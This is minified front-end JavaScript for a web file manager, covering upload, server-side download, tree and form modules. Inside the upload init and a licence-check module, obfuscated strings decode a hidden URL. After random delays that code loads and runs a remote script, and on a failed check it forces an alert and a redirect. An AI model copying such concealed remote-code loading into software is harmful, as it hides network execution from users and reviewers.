      \n {{/if}}\n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
      \n
      {{list.ext |kod.window.htmlEncode}} {{LNG.file}}
      \n
      {{list.size |pathTools.fileSize}}
      \n
      {{list.mtime || \"\"}}
      \n
      \n
      \n\n\n{{else if type=='split-file'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n
      \n {{fileIconMake('file','split',list)}}\n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
      \n {{/if}}\n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
      \n
      \n{{/if}}\n\n"),define("app/common/tree",["../path/pathOperate","../path/clipboard","../path/search"],function(e){var t,a,i=e("../path/pathOperate"),n=e("../path/clipboard"),o=e("../path/search"),s=!1; +if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]);var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
      '+'
      '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
      ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
      ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
      '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
      ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){var a=(100*t).toFixed(1)+"%";$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")"),Title.set(s+"/"+o+"("+a+","+r+")");var i=c(e,t),n=$("#"+e.id),l=n.find(".progress .progress-bar");l.length||(l=$('
      ').appendTo(n).find(".progress-bar")),n.find(".state").text(a+"("+i+")"),l.css("width",a)}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),Title.reset(),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
      '+LNG.upload_drag_tips+"
      ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
      ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group 